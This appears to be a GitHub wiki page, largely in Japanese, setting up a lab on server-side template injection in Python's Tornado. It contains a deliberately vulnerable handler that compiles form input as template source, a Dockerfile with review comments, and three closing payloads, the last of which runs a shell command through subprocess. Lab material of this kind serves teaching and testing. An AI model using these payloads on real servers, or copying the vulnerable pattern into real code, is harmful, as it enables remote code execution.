SSTI python 04 - yujitounai/helloworld GitHub Wiki

サーバーサイドテンプレートインジェクション

脆弱なソースコード (python Tornado)

server.py

import tornado.ioloop
import tornado.web
import tornado.template


class MainHandler(tornado.web.RequestHandler):
    """Deliberately vulnerable handler for "/" used to demonstrate SSTI.

    GET writes a static HTML form. POST splices the submitted ``name``
    field into template *source* before compiling it, which is the
    injection point this page is about.
    """

    def get(self):
        """Write the static form page; no request data is used here."""
        self.write('<!DOCTYPE html><html><body>\
    <form action="/" method="post">\
      First name:<br>\
      <input type="text" name="name" value="">\
      <input type="submit" value="Submit">\
    </form><h2>Hello  </h2></body></html>')
    def post(self):
        """Render the greeting by compiling user input as template source.

        VULNERABLE (server-side template injection): the ``name`` body
        argument is inserted into the template text with ``%`` and only then
        handed to ``tornado.template.Template``. Any template syntax inside
        the value is therefore compiled and executed on the server instead of
        being displayed as text.
        """
        # Redundant initial value; it is overwritten on the next line.
        person = ""
        # Untrusted value taken directly from the POST body, with no
        # validation or escaping applied before it is used below.
        person = self.get_body_argument("name",default="")
        # Root cause: string formatting is applied to the template source, so
        # request data becomes template code. The safe pattern is a constant
        # template string with a placeholder such as {{ name }} and the value
        # passed as data via t.generate(name=person); the value is then
        # rendered through Tornado's default autoescaping and never compiled.
        t = tornado.template.Template('<!DOCTYPE html><html><body>\
    <form action="/" method="post">\
      First name:<br>\
      <input type="text" name="name" value="">\
      <input type="submit" value="Submit">\
    </form><h2>Hello %s! </h2></body></html>' % person)
        # generate() is called without arguments: everything the template
        # renders was already baked into its source above.
        self.write(t.generate())

def make_app():
    """Build the Tornado application with MainHandler mounted at "/"."""
    routes = [(r"/", MainHandler)]
    return tornado.web.Application(routes)

if __name__ == "__main__":
    # Listens on every interface (0.0.0.0), which is what makes the port
    # reachable through a container port mapping. Because the handler is
    # deliberately vulnerable, limit who can reach this port at the Docker or
    # network layer (for example, publish it to localhost only).
    make_app().listen(5073, address='0.0.0.0')
    # Blocks here, serving requests until the process is stopped.
    tornado.ioloop.IOLoop.current().start()


Dockerfile

# Lab image for the vulnerable server above.
# NOTE(review): "python:3" is a floating tag and the pip installs below are
# unpinned, so rebuilds can pull different interpreter and package versions.
# Pin a specific tag and package versions if the lab must be reproducible.
FROM python:3
# Copies the whole src/ directory (presumably including server.py) to /home.
COPY src/ /home
# NOTE(review): flask is not imported by the server.py shown on this page; it
# may be needed by other files under src/. Confirm before removing.
RUN pip3 install flask
RUN pip3 install tornado
# NOTE(review): typing has been part of the standard library since Python 3.5;
# the PyPI package is a backport and is presumably unnecessary on python:3.
RUN pip3 install typing
# NOTE(review): no USER or CMD instruction is visible here. Unless a user is
# set elsewhere (e.g. in a compose file), the server, and any code executed
# through the template injection, runs as root inside the container.

攻撃する方法

{{7*7}}

{% import os %}

{{__import__("subprocess").check_output("ls")}}
